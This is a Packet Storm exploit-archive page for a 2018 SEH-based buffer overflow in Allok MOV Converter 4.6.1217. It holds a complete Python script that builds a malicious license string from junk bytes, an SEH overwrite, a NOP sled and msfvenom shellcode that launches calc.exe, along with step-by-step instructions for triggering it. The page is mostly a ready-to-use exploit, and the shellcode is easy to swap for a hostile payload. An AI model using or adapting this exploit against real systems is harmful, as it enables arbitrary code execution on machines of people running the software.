exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Allok MOV Converter 4.6.1217 Buffer Overflow

Allok MOV Converter 4.6.1217 Buffer Overflow
Posted Jul 30, 2018
Authored by Shubham Singh

Allok MOV Converter version 4.6.1217 suffers from a buffer overflow vulnerability.

tags | exploit, overflow
SHA-256 | f044517576deac6ab5a1a13f6f5e6467e05afc881c175e184e7ebf9eb713f076

Allok MOV Converter 4.6.1217 Buffer Overflow

Change Mirror Download
# Exploit Title     : Allok MOV Converter 4.6.1217 - Remote Buffer Overflow  
# Discovery by : Shubham Singh
# Known As : Spirited Wolf [Twitter: @Pwsecspirit]
# Email : spiritedwolf@protonmail.com
# Youtube Channel : www.youtube.com/c/Pentestingwithspirit
# Discovey Date : 29/07/2018
# Software Link : https://www.alloksoft.com/allok_movconverter.exe
# Tested Version : 4.6.1217
# Tested on OS : Windows XP Service Pack 3 x86
# Steps to Reproduce: Run the python exploit script, it will create a new file with the name "exploit.txt" just copy the text inside "exploit.txt"
# Start the Allok MOV Converter 4.6.1217 program and in the Lisence name paste the content of "exploit.txt" and click on Register.
# You will see a sweet calculator poped up.
# Greetz : @hexachordanu @FuzzySec @LiveOverflow

file = open("exploit.txt","wb")
junk = "\x41" * 780
nseh = "\xeb\x10\x90\x90" #Short Jump address
seh = "\x79\x25\x01\x76" #0x76012579

nops = "\x90" * 16

#badchar \x00\x08\x09\x0a\x0b\x0c\x0d
#msfvenom -p windows/exec CMD=calc.exe -b '\x00\x08\x09\x0a\x0b\x0c\x0d' -f python
buf = ""
buf += "\xba\xbb\xf0\xaa\x11\xdd\xc3\xd9\x74\x24\xf4\x5e\x31"
buf += "\xc9\xb1\x31\x83\xee\xfc\x31\x56\x0f\x03\x56\xb4\x12"
buf += "\x5f\xed\x22\x50\xa0\x0e\xb2\x35\x28\xeb\x83\x75\x4e"
buf += "\x7f\xb3\x45\x04\x2d\x3f\x2d\x48\xc6\xb4\x43\x45\xe9"
buf += "\x7d\xe9\xb3\xc4\x7e\x42\x87\x47\xfc\x99\xd4\xa7\x3d"
buf += "\x52\x29\xa9\x7a\x8f\xc0\xfb\xd3\xdb\x77\xec\x50\x91"
buf += "\x4b\x87\x2a\x37\xcc\x74\xfa\x36\xfd\x2a\x71\x61\xdd"
buf += "\xcd\x56\x19\x54\xd6\xbb\x24\x2e\x6d\x0f\xd2\xb1\xa7"
buf += "\x5e\x1b\x1d\x86\x6f\xee\x5f\xce\x57\x11\x2a\x26\xa4"
buf += "\xac\x2d\xfd\xd7\x6a\xbb\xe6\x7f\xf8\x1b\xc3\x7e\x2d"
buf += "\xfd\x80\x8c\x9a\x89\xcf\x90\x1d\x5d\x64\xac\x96\x60"
buf += "\xab\x25\xec\x46\x6f\x6e\xb6\xe7\x36\xca\x19\x17\x28"
buf += "\xb5\xc6\xbd\x22\x5b\x12\xcc\x68\x31\xe5\x42\x17\x77"
buf += "\xe5\x5c\x18\x27\x8e\x6d\x93\xa8\xc9\x71\x76\x8d\x26"
buf += "\x38\xdb\xa7\xae\xe5\x89\xfa\xb2\x15\x64\x38\xcb\x95"
buf += "\x8d\xc0\x28\x85\xe7\xc5\x75\x01\x1b\xb7\xe6\xe4\x1b"
buf += "\x64\x06\x2d\x78\xeb\x94\xad\x51\x8e\x1c\x57\xae"

more = "\x41" * 100
exploit = junk + nseh + seh + nops + buf + more

file.write(exploit)
file.close()

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close